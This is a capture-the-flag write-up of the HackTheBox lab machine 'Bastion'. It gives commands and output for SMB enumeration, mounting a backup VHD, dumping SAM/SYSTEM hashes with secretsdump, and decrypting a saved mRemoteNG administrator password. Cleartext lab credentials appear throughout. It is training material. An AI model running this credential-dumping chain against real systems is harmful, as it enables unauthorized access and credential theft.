HackTheBox - Bastion
OS | Difficulty | IP Address | Status |
---|---|---|---|
Windows | Easy | 10.10.10.134 | Retired |
This box was classified as an easy machine by L4mpje on HackTheBox. Enumerating the box, we will find a SMB share used for backup. We will mount it and find a virtual hard disk file, mount the .vhd, and dump the SAM and SYSTEM files; crack it to get our initial foothold. Enumerating to privilege escalate, we find a strange program, mRemoteNG, and it's password can be decrypted with mRemoteNG Decryption Tool which will give us the Administrator password.
Phase 1 - Enumeration
Nmap
As usual, we start phase one with nmap, to see what ports are opened.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -36m05s, deviation: 1h09m16s, median: 3m53s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Bastion
| NetBIOS computer name: BASTION\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-07-18T19:48:23+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-07-18T17:48:27
|_ start_date: 2021-07-17T01:17:54
From the nmap result, we find out that its running a Windows Server 2016.
SMB
We will enumerate SMB with a non-existing user.
smbmap -u DoesNotExist -H 10.10.10.134
[+] Guest session IP: 10.10.10.134:445 Name: 10.10.10.134
[/] Work[!] Unable to remove test directory at \\10.10.10.134\Backups\GAUTGQWZEI, please remove manually
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
Backups READ, WRITE
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
It looks like there is a share folder called ‘Backups’ with read and write access. Let’s mount it and see what’s in it.
Mounting SMB Share
# we will make a folder to mount the share drive in
mkdir /mnt/smb
# then we will mount the drive to the folder
mount -t cifs //10.10.10.134/Backups /mnt/smb
Going through the share drive, we find something interesting.
/mnt/smb/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351$ ls -la
9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
A virtual hard disk (vhd) file, which looks to be the main drive’s backup.
Phase 2 - Exploitation
Guestmount
Let’s mount the .vhd file
# we will create a folder to mount the vhd
mkdir /mnt/vhd
# then mount the vhd drive
sudo guestmount --add 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro -v /mnt/vhd
Dumping SAM and SYSTEM files
Going through the vhd backup, there wasn’t anything interesting; so we went to the directory location where the Windows SAM (Security Account Manager) and SYSTEM files are kept.
# SAM & SYSTEM location
cd /mnt/vhd/Windows/System32/config/
# copying the files to our local kali machine
cp SAM SYSTEM ~/Documents/htb/machines/bastion/
Dumping/Cracking Hashes
Using Impacket’s SecretsDump, we dump the user accounts password hashes
impacket-secretsdump -sam SAM -system SYSTEM local
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Cleaning up...
We then go to hashes.org to crack the hashes online. From the 3 dumped hashes, one cracked for the user L4mpje.
We login with SSH and get the user.txt flag
l4mpje:bureaulampje
Phase 3 - Privilege Escalation
Going through and enumerating the Windows machine, we find an out of place program.
cd C:\Program Files (x86)\mRemoteNG
Doing a little Googling, we find an article on how mRemoteNG Password is insecure and how to get the saved, but encrypted password which could be decrypted by using a tool on Github (mRemoteNG Decryption Tool).
According to the article, all we need is the saved and encrypted password string from the mRemoteNG’s temporary configuration file named ‘confCons.xml’ which we will find in the cache data.
cd C:\Users\L4mpje\AppData\Roaming\mRemoteNG
type confCons.xml
Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
And we found the encrypted saved password string we were looking for, we the run the mRemoteNG-Decrypt tool from Github with the following command:
python3 mRemoteNG-Decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
Password: thXLHM96BeKL0ER2
# successful SSH login
ssh administrator@10.10.10.134
administrator@10.10.10.134's password:
Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved.
administrator@BASTION C:\Users\Administrator>
Finally, we get the Administrator password and have escalated privileges.
Post a Comment